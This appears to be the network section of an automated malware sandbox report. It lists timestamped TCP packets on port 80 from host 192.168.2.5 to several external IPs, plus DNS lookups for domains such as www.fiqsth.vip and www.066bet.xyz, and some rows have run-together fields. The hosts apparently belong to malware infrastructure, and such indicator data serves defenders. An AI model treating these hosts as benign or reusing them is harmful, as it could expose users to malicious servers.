Nov 14, 2024 15:41:25.906035900 CET | 50005 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:25.966475964 CET | 80 | 50005 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:25.966579914 CET | 50005 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:26.530658007 CET | 50005 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:27.548041105 CET | 50006 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:27.554433107 CET | 80 | 50006 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:27.554639101 CET | 50006 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:27.567817926 CET | 50006 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:27.573267937 CET | 80 | 50006 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:27.573354959 CET | 80 | 50006 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:28.371813059 CET | 80 | 50006 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:28.420603991 CET | 50006 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:28.482564926 CET | 80 | 50006 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:28.482904911 CET | 50006 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:29.077023983 CET | 50006 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:30.095839977 CET | 50007 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:30.101289988 CET | 80 | 50007 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:30.101394892 CET | 50007 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:30.107841015 CET | 50007 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:30.113192081 CET | 80 | 50007 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:30.915450096 CET | 80 | 50007 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:30.915812016 CET | 80 | 50007 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:30.915832043 CET | 80 | 50007 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:30.915910006 CET | 50007 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:30.967510939 CET | 50007 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:31.025813103 CET | 80 | 50007 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:31.026057959 CET | 50007 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:31.026742935 CET | 50007 | 80 | 192.168.2.5 | 217.70.184.50
Nov 14, 2024 15:41:31.031539917 CET | 80 | 50007 | 217.70.184.50 | 192.168.2.5
Nov 14, 2024 15:41:36.052001953 CET | 50008 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:36.057706118 CET | 80 | 50008 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:36.057969093 CET | 50008 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:36.071978092 CET | 50008 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:36.076982975 CET | 80 | 50008 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:37.577516079 CET | 50008 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:37.583367109 CET | 80 | 50008 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:37.586693048 CET | 50008 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:38.595141888 CET | 50009 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:38.600431919 CET | 80 | 50009 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:38.600649118 CET | 50009 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:38.611922979 CET | 50009 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:38.617307901 CET | 80 | 50009 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:39.237077951 CET | 80 | 50009 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:39.237277985 CET | 50009 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:40.124552965 CET | 50009 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:40.129513025 CET | 80 | 50009 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:41.148587942 CET | 50010 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:41.293114901 CET | 80 | 50010 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:41.293210030 CET | 50010 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:41.306106091 CET | 50010 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:41.311516047 CET | 80 | 50010 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:41.311783075 CET | 80 | 50010 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:41.920639038 CET | 80 | 50010 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:41.924216986 CET | 50010 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:42.811476946 CET | 50010 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:42.816803932 CET | 80 | 50010 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:43.868455887 CET | 50011 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:43.874223948 CET | 80 | 50011 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:43.876144886 CET | 50011 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:43.911240101 CET | 50011 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:43.916975975 CET | 80 | 50011 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:44.503148079 CET | 80 | 50011 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:44.503407001 CET | 80 | 50011 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:44.503703117 CET | 50011 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:44.507471085 CET | 50011 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:44.512501955 CET | 80 | 50011 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:49.688261986 CET | 50012 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:49.693258047 CET | 80 | 50012 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:49.693358898 CET | 50012 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:49.704267025 CET | 50012 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:49.709212065 CET | 80 | 50012 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:50.352672100 CET | 80 | 50012 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:50.356400013 CET | 50012 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:51.217916965 CET | 50012 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:51.223120928 CET | 80 | 50012 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:52.236340046 CET | 50013 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:52.241867065 CET | 80 | 50013 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:52.241971970 CET | 50013 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:52.251157999 CET | 50013 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:52.256171942 CET | 80 | 50013 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:52.860915899 CET | 80 | 50013 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:52.860975981 CET | 50013 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:53.768357992 CET | 50013 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:53.773514986 CET | 80 | 50013 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:54.782999992 CET | 50014 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:54.788444996 CET | 80 | 50014 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:54.788582087 CET | 50014 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:54.797796011 CET | 50014 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:54.803095102 CET | 80 | 50014 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:54.804550886 CET | 80 | 50014 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:55.421422005 CET | 80 | 50014 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:55.421503067 CET | 50014 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:56.311656952 CET | 50014 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:56.317177057 CET | 80 | 50014 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:57.329895020 CET | 50015 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:57.335478067 CET | 80 | 50015 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:57.335573912 CET | 50015 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:57.341712952 CET | 50015 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:57.347661972 CET | 80 | 50015 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:57.997410059 CET | 80 | 50015 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:58.029865980 CET | 80 | 50015 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:41:58.036459923 CET | 50015 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:58.044614077 CET | 50015 | 80 | 192.168.2.5 | 3.33.130.190
Nov 14, 2024 15:41:58.050106049 CET | 80 | 50015 | 3.33.130.190 | 192.168.2.5
Nov 14, 2024 15:42:04.412580967 CET | 50016 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:04.418097019 CET | 80 | 50016 | 47.52.221.8 | 192.168.2.5
Nov 14, 2024 15:42:04.418349028 CET | 50016 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:04.436578989 CET | 50016 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:04.441977978 CET | 80 | 50016 | 47.52.221.8 | 192.168.2.5
Nov 14, 2024 15:42:05.386183977 CET | 80 | 50016 | 47.52.221.8 | 192.168.2.5
Nov 14, 2024 15:42:05.436840057 CET | 50016 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:05.789741039 CET | 80 | 50016 | 47.52.221.8 | 192.168.2.5
Nov 14, 2024 15:42:05.789805889 CET | 80 | 50016 | 47.52.221.8 | 192.168.2.5
Nov 14, 2024 15:42:05.790424109 CET | 50016 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:05.937002897 CET | 50016 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:06.955049038 CET | 50017 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:06.962095022 CET | 80 | 50017 | 47.52.221.8 | 192.168.2.5
Nov 14, 2024 15:42:06.962204933 CET | 50017 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:06.972146988 CET | 50017 | 80 | 192.168.2.5 | 47.52.221.8
Nov 14, 2024 15:42:06.978739023 CET | 80 | 50017 | 47.52.221.8 | 192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:07.926253080 CET805001747.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:07.983876944 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:08.107893944 CET805001747.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:08.108753920 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:08.483843088 CET5001780192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.502094984 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.509275913 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:09.509356976 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.518564939 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:09.526201010 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:09.526344061 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:10.511049986 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:10.564706087 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:10.697789907 CET805001847.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:10.697849035 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:11.030749083 CET5001880192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.052757978 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.057835102 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:12.060858965 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.066786051 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:12.072191000 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:13.143342972 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:13.186990976 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:13.249778986 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:13.249910116 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:13.250638008 CET5001980192.168.2.547.52.221.8
                                                                                                                                                  Nov 14, 2024 15:42:13.255530119 CET805001947.52.221.8192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:18.362597942 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:18.367768049 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:18.367892981 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:18.379656076 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:18.385386944 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:19.205506086 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:19.249603033 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:19.289706945 CET805002023.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:19.289772987 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:19.892649889 CET5002080192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.909214020 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.914489031 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:20.914565086 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.927007914 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:20.932246923 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:21.730305910 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:21.780997992 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:21.834111929 CET805002123.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:21.837616920 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:22.437377930 CET5002180192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.457007885 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.462120056 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:23.462296963 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.472651958 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:23.478780985 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:23.480084896 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:24.278050900 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:24.329129934 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:24.388907909 CET805002223.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:24.389137983 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:24.984294891 CET5002280192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.003333092 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.009004116 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.011250019 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.017354012 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.022295952 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.817015886 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.859093904 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.921355963 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:26.921473980 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.922657967 CET5002380192.168.2.523.106.59.18
                                                                                                                                                  Nov 14, 2024 15:42:26.927669048 CET805002323.106.59.18192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.256431103 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:40.263499022 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.263588905 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:40.278240919 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:40.283381939 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.874614954 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.874721050 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:41.785336018 CET5002480192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:41.790277004 CET8050024208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:42.801103115 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:42.806292057 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:42.806364059 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:42.821852922 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:42.826766968 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:43.462970972 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:43.463037014 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:44.328254938 CET5002580192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:44.334006071 CET8050025208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.346318960 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:45.351778030 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.351861000 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:45.360934019 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:45.369752884 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.370615005 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.943895102 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:45.944113016 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:46.875155926 CET5002680192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.126734018 CET8050026208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:47.896419048 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.902637959 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:47.903172016 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.909849882 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:47.914741039 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.098988056 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.099042892 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.099055052 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.099082947 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:49.100887060 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:49.100946903 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:49.102271080 CET5002780192.168.2.5208.91.197.27
                                                                                                                                                  Nov 14, 2024 15:42:49.107309103 CET8050027208.91.197.27192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:54.155585051 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:54.160573006 CET80500283.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:54.160979986 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:54.225327969 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:54.230535030 CET80500283.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:55.734741926 CET5002880192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:55.780798912 CET80500283.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:56.756206989 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:56.761142969 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:56.761220932 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:56.786191940 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:56.791254044 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:57.456154108 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:57.456299067 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:58.297344923 CET5002980192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:58.308584929 CET80500293.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:59.315922022 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:59.321075916 CET80500303.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:59.321135044 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:59.335459948 CET5003080192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:42:59.340666056 CET80500303.33.130.190192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                  Nov 14, 2024 15:42:18.269285917 CET192.168.2.51.1.1.10xfec7Standard query (0)www.vehiculargustav.clickA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:31.940896034 CET192.168.2.51.1.1.10xfef1Standard query (0)www.bulls777.proA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:40.082256079 CET192.168.2.51.1.1.10x981bStandard query (0)www.yushaliu.onlineA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:54.115345955 CET192.168.2.51.1.1.10x66a9Standard query (0)www.marketprediction.appA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:43:07.552159071 CET192.168.2.51.1.1.10xe45cStandard query (0)www.066bet.xyzA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 14, 2024 15:39:39.925853968 CET | 1.1.1.1 | 192.168.2.5 | 0x75f3 | No error (0) | www.corpseflowerwatch.org | corpseflowerwatch.org |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:39:39.925853968 CET | 1.1.1.1 | 192.168.2.5 | 0x75f3 | No error (0) | corpseflowerwatch.org |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:39:39.925853968 CET | 1.1.1.1 | 192.168.2.5 | 0x75f3 | No error (0) | corpseflowerwatch.org |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:39:55.694902897 CET | 1.1.1.1 | 192.168.2.5 | 0x500f | No error (0) | www.4nk.education | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:39:55.694902897 CET | 1.1.1.1 | 192.168.2.5 | 0x500f | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:40:09.371701002 CET | 1.1.1.1 | 192.168.2.5 | 0xd3c9 | No error (0) | www.migraine-massages.pro |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:40:23.005467892 CET | 1.1.1.1 | 192.168.2.5 | 0x3d05 | No error (0) | www.vnxoso88.art | 77980.bodis.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:40:23.005467892 CET | 1.1.1.1 | 192.168.2.5 | 0x3d05 | No error (0) | 77980.bodis.com |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:40:36.694467068 CET | 1.1.1.1 | 192.168.2.5 | 0xb0 | No error (0) | www.pluribiz.life |  | 209.74.64.58 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:40:50.553510904 CET | 1.1.1.1 | 192.168.2.5 | 0x76c4 | No error (0) | www.kdtzhb.top |  | 47.242.89.146 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:41:04.437089920 CET | 1.1.1.1 | 192.168.2.5 | 0x3ebd | No error (0) | www.evoo.website |  | 128.65.195.180 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:41:22.460025072 CET | 1.1.1.1 | 192.168.2.5 | 0xc0e9 | No error (0) | www.astorg-group.info | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:41:22.460025072 CET | 1.1.1.1 | 192.168.2.5 | 0xc0e9 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:41:36.046595097 CET | 1.1.1.1 | 192.168.2.5 | 0x5316 | No error (0) | www.fiqsth.vip | fiqsth.vip |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:41:36.046595097 CET | 1.1.1.1 | 192.168.2.5 | 0x5316 | No error (0) | fiqsth.vip |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:41:36.046595097 CET | 1.1.1.1 | 192.168.2.5 | 0x5316 | No error (0) | fiqsth.vip |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 15:41:49.685539961 CET | 1.1.1.1 | 192.168.2.5 | 0xffa7 | No error (0) | www.bio-thymus.com | bio-thymus.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 15:41:49.685539961 CET | 1.1.1.1 | 192.168.2.5 | 0xffa7 | No error (0) | bio-thymus.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
